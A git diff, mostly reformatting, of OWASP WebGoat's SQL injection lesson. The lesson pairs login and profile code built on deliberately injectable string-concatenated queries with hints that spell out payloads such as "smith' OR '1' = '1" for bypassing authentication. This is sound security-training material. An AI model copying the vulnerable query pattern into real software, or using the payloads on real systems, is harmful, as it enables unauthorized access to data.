- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Login extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public Login(GoatHillsFinancial lesson, String lessonName, String actionName,
-	    LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    ValidationException
-    {
-	//System.out.println("Login.handleRequest()");
-	getLesson().setCurrentAction(s, getActionName());
-
-	List employees = getAllEmployees(s);
-	setSessionAttribute(s, getLessonName() + "."
-		+ SQLInjection.STAFF_ATTRIBUTE_KEY, employees);
-
-	String employeeId = null;
-	try
+	public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    employeeId = s.getParser().getStringParameter(
-		    SQLInjection.EMPLOYEE_ID);
-	    String password = s.getParser().getRawParameter(
-		    SQLInjection.PASSWORD);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-	    // Attempt authentication
-	    boolean authenticated = login(s, employeeId, password);
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
+	{
+		// System.out.println("Login.handleRequest()");
+		getLesson().setCurrentAction(s, getActionName());
 
-	    updateLessonStatus(s);
+		List employees = getAllEmployees(s);
+		setSessionAttribute(s, getLessonName() + "." + SQLInjection.STAFF_ATTRIBUTE_KEY, employees);
 
-	    if (authenticated)
-	    {
-		// Execute the chained Action if authentication succeeded.
+		String employeeId = null;
 		try
 		{
-		    chainedAction.handleRequest(s);
-		}
-		catch (UnauthenticatedException ue1)
+			employeeId = s.getParser().getStringParameter(SQLInjection.EMPLOYEE_ID);
+			String password = s.getParser().getRawParameter(SQLInjection.PASSWORD);
+
+			// Attempt authentication
+			boolean authenticated = login(s, employeeId, password);
+
+			updateLessonStatus(s);
+
+			if (authenticated)
+			{
+				// Execute the chained Action if authentication succeeded.
+				try
+				{
+					chainedAction.handleRequest(s);
+				} catch (UnauthenticatedException ue1)
+				{
+					System.out.println("Internal server error");
+					ue1.printStackTrace();
+				} catch (UnauthorizedException ue2)
+				{
+					System.out.println("Internal server error");
+					ue2.printStackTrace();
+				}
+			}
+			else
+				s.setMessage("Login failed");
+
+		} catch (ParameterNotFoundException pnfe)
 		{
-		    System.out.println("Internal server error");
-		    ue1.printStackTrace();
+			// No credentials offered, so we log them out
+			setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
 		}
-		catch (UnauthorizedException ue2)
+	}
+
+	public String getNextPage(WebSession s)
+	{
+		String nextPage = SQLInjection.LOGIN_ACTION;
+
+		if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s);
+
+		return nextPage;
+
+	}
+
+	public boolean requiresAuthentication()
+	{
+		return false;
+	}
+
+	public boolean login(WebSession s, String userId, String password)
+	{
+		// System.out.println("Logging in to lesson");
+		boolean authenticated = false;
+
+		try
 		{
-		    System.out.println("Internal server error");
-		    ue2.printStackTrace();
-		}
-	    }
-	    else
-		s.setMessage("Login failed");
-
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // No credentials offered, so we log them out
-	    setSessionAttribute(s, getLessonName() + ".isAuthenticated",
-		    Boolean.FALSE);
-	}
-    }
-
-
-    public String getNextPage(WebSession s)
-    {
-	String nextPage = SQLInjection.LOGIN_ACTION;
-
-	if (isAuthenticated(s))
-	    nextPage = chainedAction.getNextPage(s);
-
-	return nextPage;
-
-    }
-
-
-    public boolean requiresAuthentication()
-    {
-	return false;
-    }
-
-
-    public boolean login(WebSession s, String userId, String password)
-    {
-	//System.out.println("Logging in to lesson");
-	boolean authenticated = false;
-
-	try
-	{
-	    String query = "SELECT * FROM employee WHERE userid = " + userId
-		    + " and password = '" + password + "'";
-	    //System.out.println("Query:" + query);			
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.first())
+			String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
+			// System.out.println("Query:" + query);
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.first())
+				{
+					setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
+					setSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID, userId);
+					authenticated = true;
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error logging in");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    setSessionAttribute(s,
-			    getLessonName() + ".isAuthenticated", Boolean.TRUE);
-		    setSessionAttribute(s, getLessonName() + "."
-			    + SQLInjection.USER_ID, userId);
-		    authenticated = true;
+			s.setMessage("Error logging in");
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error logging in");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error logging in");
-	    e.printStackTrace();
+
+		// System.out.println("Lesson login result: " + authenticated);
+		return authenticated;
 	}
 
-	//System.out.println("Lesson login result: " + authenticated);
-	return authenticated;
-    }
-
-
-    public boolean login_BACKUP(WebSession s, String userId, String password)
-    {
-	//System.out.println("Logging in to lesson");
-	boolean authenticated = false;
-
-	try
+	public boolean login_BACKUP(WebSession s, String userId, String password)
 	{
-	    String query = "SELECT * FROM employee WHERE userid = " + userId
-		    + " and password = '" + password + "'";
-	    //System.out.println("Query:" + query);			
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.first())
+		// System.out.println("Logging in to lesson");
+		boolean authenticated = false;
+
+		try
 		{
-		    setSessionAttribute(s,
-			    getLessonName() + ".isAuthenticated", Boolean.TRUE);
-		    setSessionAttribute(s, getLessonName() + "."
-			    + SQLInjection.USER_ID, userId);
-		    authenticated = true;
-		}
+			String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
+			// System.out.println("Query:" + query);
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.first())
+				{
+					setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
+					setSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID, userId);
+					authenticated = true;
+				}
 
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error logging in");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error logging in");
-	    e.printStackTrace();
-	}
-
-	//System.out.println("Lesson login result: " + authenticated);
-	return authenticated;
-    }
-
-
-    public List getAllEmployees(WebSession s)
-    {
-	List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-	// Query the database for all roles the given employee belongs to
-	// Query the database for all employees "owned" by these roles
-
-	try
-	{
-	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
-		    + "where employee.userid=roles.userid";
-
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		answer_results.beforeFirst();
-		while (answer_results.next())
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error logging in");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    int employeeId = answer_results.getInt("userid");
-		    String firstName = answer_results.getString("first_name");
-		    String lastName = answer_results.getString("last_name");
-		    String role = answer_results.getString("role");
-		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
-			    lastName, role);
-		    employees.add(stub);
+			s.setMessage("Error logging in");
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employees");
-		sqle.printStackTrace();
-	    }
+
+		// System.out.println("Lesson login result: " + authenticated);
+		return authenticated;
 	}
-	catch (Exception e)
+
+	public List getAllEmployees(WebSession s)
 	{
-	    s.setMessage("Error getting employees");
-	    e.printStackTrace();
+		List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+		// Query the database for all roles the given employee belongs to
+		// Query the database for all employees "owned" by these roles
+
+		try
+		{
+			String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
+					+ "where employee.userid=roles.userid";
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				answer_results.beforeFirst();
+				while (answer_results.next())
+				{
+					int employeeId = answer_results.getInt("userid");
+					String firstName = answer_results.getString("first_name");
+					String lastName = answer_results.getString("last_name");
+					String role = answer_results.getString("role");
+					EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
+					employees.add(stub);
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employees");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employees");
+			e.printStackTrace();
+		}
+
+		return employees;
 	}
 
-	return employees;
-    }
-
-
-    private void updateLessonStatus(WebSession s)
-    {
-	try
+	private void updateLessonStatus(WebSession s)
 	{
-	    String employeeId = s.getParser().getStringParameter(
-		    SQLInjection.EMPLOYEE_ID);
-	    String password = s.getParser().getRawParameter(
-		    SQLInjection.PASSWORD);
-	    String stage = getStage(s);
-	    if (SQLInjection.STAGE1.equals(stage))
-	    {
-		    if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID
-			    && isAuthenticated(s))
-		    {
-			setStageComplete(s, SQLInjection.STAGE1);
-		    }
-	    }
-	    else if (SQLInjection.STAGE2.equals(stage))
-	    {
-		    // This assumes the student hasn't modified login_BACKUP().
-		    if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID
-			    && !isAuthenticated(s)
-			    && login_BACKUP(s, employeeId, password))
-		    {
-			setStageComplete(s, SQLInjection.STAGE2);
-		    }
-	    }
+		try
+		{
+			String employeeId = s.getParser().getStringParameter(SQLInjection.EMPLOYEE_ID);
+			String password = s.getParser().getRawParameter(SQLInjection.PASSWORD);
+			String stage = getStage(s);
+			if (SQLInjection.STAGE1.equals(stage))
+			{
+				if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID && isAuthenticated(s))
+				{
+					setStageComplete(s, SQLInjection.STAGE1);
+				}
+			}
+			else if (SQLInjection.STAGE2.equals(stage))
+			{
+				// This assumes the student hasn't modified login_BACKUP().
+				if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID && !isAuthenticated(s)
+						&& login_BACKUP(s, employeeId, password))
+				{
+					setStageComplete(s, SQLInjection.STAGE2);
+				}
+			}
+		} catch (ParameterNotFoundException pnfe)
+		{
+		}
 	}
-	catch (ParameterNotFoundException pnfe)
-	{}
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
index fac41d1b1..055077ec2 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.SQLInjection;
 
 import java.util.ArrayList;
@@ -18,249 +19,230 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class SQLInjection extends GoatHillsFinancial
 {
-    private final static Integer DEFAULT_RANKING = new Integer(75);
+	private final static Integer DEFAULT_RANKING = new Integer(75);
 
-    public final static int PRIZE_EMPLOYEE_ID = 112;
+	public final static int PRIZE_EMPLOYEE_ID = 112;
 
-    public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
+	public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
 
-    public final static String STAGE1 = "String SQL Injection";
-    
-    public final static String STAGE2 = "Parameterized Query #1";
-    
-    public final static String STAGE3 = "Numeric SQL Injection";
-    
-    public final static String STAGE4 = "Parameterized Query #2";
-    
-    public void registerActions(String className)
-    {
-	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+	public final static String STAGE1 = "String SQL Injection";
 
-	// These actions are special in that they chain to other actions.
-	registerAction(new Login(this, className, LOGIN_ACTION,
-		getAction(LISTSTAFF_ACTION)));
-	registerAction(new Logout(this, className, LOGOUT_ACTION,
-		getAction(LOGIN_ACTION)));
-	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
-		getAction(VIEWPROFILE_ACTION)));
-	registerAction(new UpdateProfile(this, className,
-		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-	registerAction(new DeleteProfile(this, className,
-		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
+	public final static String STAGE2 = "Parameterized Query #1";
 
-    /**
-     *  Gets the category attribute of the CrossSiteScripting object
-     *
-     * @return    The category value
-     */
-    public Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
+	public final static String STAGE3 = "Numeric SQL Injection";
 
-    /**
-     *  Gets the hints attribute of the DirectoryScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
-	hints
-		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-			+ "\"SELECT * FROM employee WHERE userid = \" + userId + \" and password = \" + password");
-	hints
-		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
-			+ "Try appending a SQL statement that always resolves to true");
+	public final static String STAGE4 = "Parameterized Query #2";
 
-	// Stage 1
-	hints
-		.add("You may need to use WebScarab to remove a field length limit to fit your attack.");
-	hints.add("Try entering a password of [ smith' OR '1' = '1 ].");
+	public void registerActions(String className)
+	{
+		registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
 
-	// Stage 2
-	hints
-		.add("Many of WebGoat's database queries are already parameterized.  Search the project for PreparedStatement.");
-
-	// Stage 3
-	hints
-		.add("Try entering an employee_id of [ 101 OR 1=1 ORDER BY 'salary' ].");
-
-	// Stage 4
-
-	return hints;
-    }
-
-    @Override
-	public String[] getStages() {
-    	if (getWebgoatContext().isCodingExercises())
-    		return new String[] {STAGE1, STAGE2, STAGE3, STAGE4};
-    	return new String[] {STAGE1, STAGE3};
+		// These actions are special in that they chain to other actions.
+		registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
+		registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
+		registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
 	}
 
-    /**
-     *  Gets the instructions attribute of the ParameterInjection object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "";
-
-	if (!getLessonTracker(s).getCompleted())
+	/**
+	 * Gets the category attribute of the CrossSiteScripting object
+	 * 
+	 * @return The category value
+	 */
+	public Category getDefaultCategory()
 	{
-		String stage = getStage(s);
-		if (STAGE1.equals(stage))
-	    {
-		    instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
-			    + "Use SQL injection to log in as the boss ('Neville') without using the correct password.  "
-			    + "Verify that Neville's profile can be viewed and that all functions are available (including Search, Create, and Delete).";
-	    }
-		else if (STAGE2.equals(stage))
+		return Category.INJECTION;
+	}
+
+	/**
+	 * Gets the hints attribute of the DirectoryScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+		hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+				+ "\"SELECT * FROM employee WHERE userid = \" + userId + \" and password = \" + password");
+		hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
+				+ "Try appending a SQL statement that always resolves to true");
+
+		// Stage 1
+		hints.add("You may need to use WebScarab to remove a field length limit to fit your attack.");
+		hints.add("Try entering a password of [ smith' OR '1' = '1 ].");
+
+		// Stage 2
+		hints
+				.add("Many of WebGoat's database queries are already parameterized.  Search the project for PreparedStatement.");
+
+		// Stage 3
+		hints.add("Try entering an employee_id of [ 101 OR 1=1 ORDER BY 'salary' ].");
+
+		// Stage 4
+
+		return hints;
+	}
+
+	@Override
+	public String[] getStages()
+	{
+		if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2, STAGE3, STAGE4 };
+		return new String[] { STAGE1, STAGE3 };
+	}
+
+	/**
+	 * Gets the instructions attribute of the ParameterInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "";
+
+		if (!getLessonTracker(s).getCompleted())
 		{
-		    instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
-			    + "Implement a fix to block SQL injection into the fields in question on the Login page. "
-			    + "Repeat stage 1.  Verify that the attack is no longer effective.";
+			String stage = getStage(s);
+			if (STAGE1.equals(stage))
+			{
+				instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
+						+ "Use SQL injection to log in as the boss ('Neville') without using the correct password.  "
+						+ "Verify that Neville's profile can be viewed and that all functions are available (including Search, Create, and Delete).";
+			}
+			else if (STAGE2.equals(stage))
+			{
+				instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
+						+ "Implement a fix to block SQL injection into the fields in question on the Login page. "
+						+ "Repeat stage 1.  Verify that the attack is no longer effective.";
+			}
+			else if (STAGE3.equals(stage))
+			{
+				instructions = "Stage 3: Execute SQL Injection to bypass authorization.<br>"
+						+ "As regular employee 'Larry', use SQL injection into a parameter of the View function "
+						+ "(from the List Staff page) to view the profile of the boss ('Neville').";
+			}
+			else if (STAGE4.equals(stage))
+			{
+				instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
+						+ "Implement a fix to block SQL injection into the relevant parameter. "
+						+ "Repeat stage 3.  Verify that access to Neville's profile is properly blocked.";
+			}
 		}
-		else if (STAGE3.equals(stage))
+
+		return instructions;
+	}
+
+	public void handleRequest(WebSession s)
+	{
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
+
+		String requestedActionName = null;
+		try
 		{
-		    instructions = "Stage 3: Execute SQL Injection to bypass authorization.<br>"
-			    + "As regular employee 'Larry', use SQL injection into a parameter of the View function "
-			    + "(from the List Staff page) to view the profile of the boss ('Neville').";
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
 		}
-		else if (STAGE4.equals(stage))
+
+		if (requestedActionName != null)
 		{
-		    instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
-			    + "Implement a fix to block SQL injection into the relevant parameter. "
-			    + "Repeat stage 3.  Verify that access to Neville's profile is properly blocked.";
-	    }
-	}
-
-	return instructions;
-    }
-
-    public void handleRequest(WebSession s)
-    {
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
-	{
-	    requestedActionName = s.getParser().getStringParameter("action");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
-	}
-
-	if (requestedActionName != null)
-	{
-	    try
-	    {
-		LessonAction action = getAction(requestedActionName);
-		if (action != null)
-		{
-		    //System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + action.getActionName());
-		    if (!action.requiresAuthentication()
-			    || action.isAuthenticated(s))
-		    {
-			action.handleRequest(s);
-			//setCurrentAction(s, action.getNextPage(s));
-		    }
+			try
+			{
+				LessonAction action = getAction(requestedActionName);
+				if (action != null)
+				{
+					// System.out.println("CrossSiteScripting.handleRequest() dispatching to: " +
+					// action.getActionName());
+					if (!action.requiresAuthentication() || action.isAuthenticated(s))
+					{
+						action.handleRequest(s);
+						// setCurrentAction(s, action.getNextPage(s));
+					}
+				}
+				else
+					setCurrentAction(s, ERROR_ACTION);
+			} catch (ParameterNotFoundException pnfe)
+			{
+				System.out.println("Missing parameter");
+				pnfe.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (ValidationException ve)
+			{
+				System.out.println("Validation failed");
+				ve.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (UnauthenticatedException ue)
+			{
+				s.setMessage("Login failed");
+				System.out.println("Authentication failure");
+				ue.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				s.setMessage("You are not authorized to perform this function");
+				System.out.println("Authorization failure");
+				ue2.printStackTrace();
+			} catch (Exception e)
+			{
+				// All other errors send the user to the generic error page
+				System.out.println("handleRequest() error");
+				e.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			}
 		}
-		else
-		    setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ParameterNotFoundException pnfe)
-	    {
-		System.out.println("Missing parameter");
-		pnfe.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ValidationException ve)
-	    {
-		System.out.println("Validation failed");
-		ve.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (UnauthenticatedException ue)
-	    {
-		s.setMessage("Login failed");
-		System.out.println("Authentication failure");
-		ue.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		s.setMessage("You are not authorized to perform this function");
-		System.out.println("Authorization failure");
-		ue2.printStackTrace();
-	    }
-	    catch (Exception e)
-	    {
-		// All other errors send the user to the generic error page
-		System.out.println("handleRequest() error");
-		e.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
 	}
 
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the CrossSiteScripting object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "LAB: SQL Injection";
-    }
+	/**
+	 * Gets the title attribute of the CrossSiteScripting object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "LAB: SQL Injection";
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
index ec93058f2..9d0bdd396 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.SQLInjection;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.Employee;
@@ -12,257 +12,217 @@ import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ViewProfile extends DefaultLessonAction
 {
 
-    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	Employee employee = null;
-
-	if (isAuthenticated(s))
+	public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    String userId = getSessionAttribute(s, getLessonName() + "."
-		    + SQLInjection.USER_ID);
-	    String employeeId = null;
-	    try
-	    {
-		// User selected employee
-		employeeId = s.getParser().getRawParameter(
-			SQLInjection.EMPLOYEE_ID);
-	    }
-	    catch (ParameterNotFoundException e)
-	    {
-		// May be an internally selected employee
-		employeeId = getRequestAttribute(s, getLessonName() + "."
-			+ SQLInjection.EMPLOYEE_ID);
-	    }
-
-	    // FIXME: If this fails and returns null, ViewProfile.jsp will blow up as it expects an Employee.
-	    // Most other JSP's can handle null session attributes.
-	    employee = getEmployeeProfile(s, userId, employeeId);
-	    // If employee==null redirect to the error page.
-	    if (employee == null)
-		getLesson().setCurrentAction(s, SQLInjection.ERROR_ACTION);
-	    else
